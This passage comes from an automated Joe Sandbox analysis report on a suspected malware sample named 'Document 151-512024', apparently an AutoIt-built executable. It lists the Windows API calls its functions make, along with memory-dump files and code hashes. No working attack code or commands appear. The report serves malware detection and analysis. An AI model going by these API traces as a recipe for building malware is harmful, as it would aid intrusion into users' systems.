Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 9cab4115868ab2b9fa3454784a70f7e189f63d03aa486a20c192e32f9a4a8c76
Instruction ID: d127f938a90cbd9ff2075d949850fa7aeab01bb2b169bfa53ba5ceecc1a041c7
Opcode Fuzzy Hash: 9cab4115868ab2b9fa3454784a70f7e189f63d03aa486a20c192e32f9a4a8c76
Instruction Fuzzy Hash: 6111E732610205ABCF14BB60DC02FAD77A59F80B10F10842EF542A61C1EE74DA499B50

Function 00978402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00978440

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: aecaff41d3e691e736a019012bd8dd3dd62bba5d08f775bed1e8f1549904ec47
Instruction ID: be941c3addc66b5f082b719ca65de83e683a571377804328d5d69492518b6346
Opcode Fuzzy Hash: aecaff41d3e691e736a019012bd8dd3dd62bba5d08f775bed1e8f1549904ec47
Instruction Fuzzy Hash: 92111876A0810AAFCB05DF58E945A9B7BF9EF48314F108059F808AB312DA71DA11CBA5

Function 00949A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0094543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00949A9C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6013303b8bbdf22fd4a11e5999838a0ada3f0b2966639bc0a870acce470c8322
Instruction ID: 3904f981fb1aa951d5af61596af20befbd15fbdddca45c31158bd3c7fa9ad73c
Opcode Fuzzy Hash: 6013303b8bbdf22fd4a11e5999838a0ada3f0b2966639bc0a870acce470c8322
Instruction Fuzzy Hash: 551106312047059FD720CE16C885F67B7E9AB44764F14C42EE99B8AA51C771E949CB60

Function 00975000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00974C7D: RtlAllocateHeap.NTDLL(00000008,00941129,00000000,?,00972E29,00000001,00000364,?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?), ref: 00974CBE

_free.LIBCMT ref: 0097506C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 77f66cf8496d90d1b42f5056d874cf2514b66068543136fcd7286f6a2bafbcb3
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: CE012B732047046BE3218F659841A5AFBECFBC5370F25451DE19C93280E6706805C674

Function 0096E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 5d51a3f1840de3ffd4f3c3cc3cd3b28440a57392d9fe1954dcb90929ddc3c1fc
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 22F02837A11A14AAC7313A79DD09B9B339C9FD2330F104B15F428931D2CB74E80286A6

Function 00974C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00941129,00000000,?,00972E29,00000001,00000364,?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?), ref: 00974CBE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ae8f95c77ec49f1d6d2430037487f3469c679c27eb38e253aa69cfb49587a7d6
Instruction ID: f9ff4d125e4600731e484d330cf2e4f595bdf2568de45c0e653b45d41b2bb484
Opcode Fuzzy Hash: ae8f95c77ec49f1d6d2430037487f3469c679c27eb38e253aa69cfb49587a7d6
Instruction Fuzzy Hash: 54F0E933647225A7DB235F629C05BDA378CBF817A0B1DC512FD9DAA186CB30DC0186E0

Function 00973820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4f5dfd3b548a34c9c9aa9401ad6bc85cc2adf4cc7613bc05bf15bbe881c1e842
Instruction ID: d3ee36bf88db97a3992d7dce0568b4c171280a4f4652219b7ca288709c9f0c99
Opcode Fuzzy Hash: 4f5dfd3b548a34c9c9aa9401ad6bc85cc2adf4cc7613bc05bf15bbe881c1e842
Instruction Fuzzy Hash: 94E0ED37101225A6E7212AA69C00FDA3B5CAB827B0F05C122BC1D96981CB31DE01A2E2

Function 00944F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944F6D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 78bc969b87a5e8679277f82ba410e3c53cadb044b0d8a5d6f9f7b07ba7c4b64d
Instruction ID: 229854d90340d24e1f82860d38e1512f03403929f2472f2131c8cfb79a6ea9ab
Opcode Fuzzy Hash: 78bc969b87a5e8679277f82ba410e3c53cadb044b0d8a5d6f9f7b07ba7c4b64d
Instruction Fuzzy Hash: D5F03071105752CFDB389F64D490E12B7E4AF143193108DBEE1EA82521C7319848DF50

Function 00942DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00942DC4

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 960a5199e446c9c7ee5026c699149c817580f7ce438ad7555ad049ed8b652ec3
Instruction ID: 44d64600b16ee40a371ca488e758a4502116e0e3d4517d4e01e1b8a5f56f9b2f
Opcode Fuzzy Hash: 960a5199e446c9c7ee5026c699149c817580f7ce438ad7555ad049ed8b652ec3
Instruction Fuzzy Hash: A7E0CDB26041245BCB10A2589C05FDA77DDDFC8790F040071FD09D7248DA60ED80C651

Function 009B2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009B26B5

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 84fc45d860badec84d8db9860e7fde9b89caeacf4308d77155e81b52cfbaf2c8
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 5DE04FB0609B009FDF399B28A9517F677E8DF4A310F00086EF69B83252E57268468A4D

Function 00942B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00943837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00943908

Part of subcall function 0094D730: GetInputState.USER32 ref: 0094D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00942B6B

Part of subcall function 009430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0094314E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: c47ccf3d2d01e66a3398d5e559a31f296c0208da12903287a235f0e642f87bca
Instruction ID: 9df6fdc4b1c4862f578f12a1dda94c4de999070d7f1c7f4b254445ddab086f1d
Opcode Fuzzy Hash: c47ccf3d2d01e66a3398d5e559a31f296c0208da12903287a235f0e642f87bca
Instruction Fuzzy Hash: 69E0866170424407CA08BB749852EADF7599BD1755F40553EF146832A3CE6545858351

Function 0098039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00980704,?,?,00000000,?,00980704,00000000,0000000C), ref: 009803B7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: da74276c271a7c1c4d1643b00647f6b18b485fd47feb7acdfff716e2c8c05991
Instruction ID: f5f58c20fb1ceba712b33a8a288256ff42fb8d343733512c43e1a6bc5903da6b
Opcode Fuzzy Hash: da74276c271a7c1c4d1643b00647f6b18b485fd47feb7acdfff716e2c8c05991
Instruction Fuzzy Hash: A8D06C3205410DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E861EB90

Function 00941CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00941CBC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 40c2cc8551d8f8239842be8b3c2ee4b5cde31fa4403d87e78f5caff4f801f417
Instruction ID: 9ff47275c7002556f23262e43f3c4c2e45b12e4ebffb88538293e4efa7377d73
Opcode Fuzzy Hash: 40c2cc8551d8f8239842be8b3c2ee4b5cde31fa4403d87e78f5caff4f801f417
Instruction Fuzzy Hash: 9FC092362C4305AFF654CBC0BC8EF907B66E348B14F04C102F709A96E3C3A26861EB50

Function 009B744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00945745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00945773

GetLastError.KERNEL32(00000002,00000000), ref: 009B76DE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: ad36cfbd30d4908794aa140847af8cc15186247c71e595c460cc33028a096167
Instruction ID: 453437c1a822dd4389b0530f1ccdee251a863d00f300fa0d070deb23b2a8eb37
Opcode Fuzzy Hash: ad36cfbd30d4908794aa140847af8cc15186247c71e595c460cc33028a096167
Instruction Fuzzy Hash: 70819F302087019FCB14EF68C591BAAB7E5BFC9320F044A5DF8965B292DB70ED45CB92

Function 0095FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0095FD1F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1b7acea36ede0eba1c784e51cc698f72b405f24f647f4ede6067a7277a80e7e9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A0312474A001099BC718CF1AD0A0969F7BAFF49321B6486B5E849CF695D731EDC4CBC0

Function 01BC2300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01BC2311

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: cf91ec4e86a335de29ff38e11f123f35b18bdb6ce5f62b61ac240dd0d508d5ff
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5CE0E67494020DDFDB00EFB4D54969E7FB4EF44702F1005A5FD01D2281D7319D508A62

Non-executed Functions

Function 009D9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009D961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009D965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 009D969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009D96C9
SendMessageW.USER32 ref: 009D96F2
GetKeyState.USER32(00000011), ref: 009D978B
GetKeyState.USER32(00000009), ref: 009D9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009D97AE
GetKeyState.USER32(00000010), ref: 009D97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009D97E9
SendMessageW.USER32 ref: 009D9810
SendMessageW.USER32(?,00001030,?,009D7E95), ref: 009D9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009D992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009D9941
SetCapture.USER32(?), ref: 009D994A
ClientToScreen.USER32(?,?), ref: 009D99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009D99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009D99D6
ReleaseCapture.USER32 ref: 009D99E1
GetCursorPos.USER32(?), ref: 009D9A19
ScreenToClient.USER32(?,?), ref: 009D9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 009D9A80
SendMessageW.USER32 ref: 009D9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 009D9AEB
SendMessageW.USER32 ref: 009D9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009D9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 009D9B4A
GetCursorPos.USER32(?), ref: 009D9B68
ScreenToClient.USER32(?,?), ref: 009D9B75
GetParent.USER32(?), ref: 009D9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 009D9BFA
SendMessageW.USER32 ref: 009D9C2B
ClientToScreen.USER32(?,?), ref: 009D9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009D9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 009D9CDE
SendMessageW.USER32 ref: 009D9D01
ClientToScreen.USER32(?,?), ref: 009D9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009D9D82

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

GetWindowLongW.USER32(?,000000F0), ref: 009D9E05

Strings

0n, xrefs: 009D9728, 009D9894, 009D98B7, 009D98EF, 009D9A3C, 009D9BB7, 009D9C5E, 009D9C8E, 009D9D2C, 009D9D58, 009D9DA1, 009D9DF2, 009D9E16, 009D9E40
@GUI_DRAGID, xrefs: 009D997D
F, xrefs: 009D9D07

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: 0n$@GUI_DRAGID$F
API String ID: 3429851547-1617144029
Opcode ID: b1b41ce23180790b97cb38c15cf00904761a87506c8152d30f68d43d42514d22
Instruction ID: 38cf39473eb6f1fc8ce262750596a02858ec145e399c80a943097512b6ea0d4f
Opcode Fuzzy Hash: b1b41ce23180790b97cb38c15cf00904761a87506c8152d30f68d43d42514d22
Instruction Fuzzy Hash: 5642BF74249201AFDB20EF64CC44FAABBE9FF48314F508A1AF699973A1D731E850DB51

Function 009D4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009D48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 009D4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 009D4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 009D494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 009D495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 009D497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009D49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009D49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 009D4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009D4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009D4A7E
IsMenu.USER32(?), ref: 009D4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009D4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009D4B20
GetWindowLongW.USER32(?,000000F0), ref: 009D4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 009D4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 009D4C82
wsprintfW.USER32 ref: 009D4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 009D4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009D4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 009D4D5A

Strings

%d/%02d/%02d, xrefs: 009D4CA8
0n, xrefs: 009D489F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$0n
API String ID: 4054740463-2744937282
Opcode ID: 55eafbb5a3154e25af30cf7ea47213d644c1c6d3b4feb32d3ce3f76e07cbea69
